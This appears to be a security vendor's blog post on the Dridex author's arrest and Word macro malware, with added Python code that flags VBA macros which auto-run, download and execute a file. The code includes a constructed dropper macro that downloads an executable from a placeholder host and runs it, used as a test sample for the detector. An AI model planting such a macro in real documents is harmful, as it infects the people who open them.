The UK National Crime Agency together with the FBI and the US Department of Justice recently filed charges against the author of Bugat/Cridex/Dridex. Andrey Ghinkul was arrested on August 28, 2015 in Cyprus and the US is now seeking his extradition. Dridex has reportedly caused multi-million dollar losses to financial institutions and businesses globally.
Dridex is known to propagate via Microsoft Word documents which pretend to be legitimate but contain malicious macro code. These macros will eventually download an executable from its C&C and/or a compromised website. F-Secure has generic detection (Trojan:W97M/MaliciousMacro.GEN) that specifically looks for malicious macros inside Office document files.
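As an added illustration of the "auto-run macro that downloads and launches an executable" pattern the post describes (this is not F-Secure's detection logic and not code from the post), the heuristic below flags VBA source that combines an auto-execution entry point, a download primitive and an execution primitive. It assumes the VBA has already been extracted from the Word file (for example with oletools' olevba); the two macros are constructed samples, not real Dridex code.

```python
import re

# Indicator classes a reviewer looks for in extracted VBA source.
# Any one alone is common in legitimate macros; all three together
# (runs on open, fetches from the network, launches what it fetched)
# is the dropper pattern described in the post.
AUTO_EXEC = re.compile(r"\bSub\s+(AutoOpen|Document_Open|AutoExec|Workbook_Open)\b", re.I)
DOWNLOAD = re.compile(r"\b(URLDownloadToFile|XMLHTTP|WinHttpRequest|ADODB\.Stream)\b", re.I)
EXECUTE = re.compile(r"\b(Shell|WScript\.Shell|CreateProcess)\b", re.I)


def classify_macro(vba_source: str) -> dict:
    """Return the matched indicators per class and an overall verdict."""
    found = {
        "auto_exec": sorted({m.lower() for m in AUTO_EXEC.findall(vba_source)}),
        "download": sorted({m.lower() for m in DOWNLOAD.findall(vba_source)}),
        "execute": sorted({m.lower() for m in EXECUTE.findall(vba_source)}),
    }
    # Verdict only when all three classes are present (reduces false positives
    # on macros that merely shell out or merely fetch data).
    found["suspicious"] = all(found[k] for k in ("auto_exec", "download", "execute"))
    return found


# Constructed sample macros (not taken from any real Dridex document).
BENIGN_MACRO = """
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
"""

DROPPER_MACRO = """
Sub AutoOpen()
    Dim dst As String
    dst = Environ("TEMP") & "\\update.exe"
    URLDownloadToFile 0, "http://example.invalid/x.exe", dst, 0, 0
    Shell dst, vbHide
End Sub
"""

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_MACRO), ("dropper", DROPPER_MACRO)):
        print(name, classify_macro(src))
```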
As the authorities clean up the Dridex botnet, the effect on malicious macro detections has been felt, and a spike can be seen in our back end statistics.
F-Secure customers are protected by our Hydra (scanning engine) and DeepGuard (behavioral-based) technologies.
Besides the generic signature detection of malicious macros, our DeepGuard behavioral engine also blocks the resulting behavior. Two layers of protection are better than one.
A document dropping an executable? Yeah, that’s never a good thing.
Q: Are these Dridex activities all related to authorities taking down the botnet?
A: We don’t know.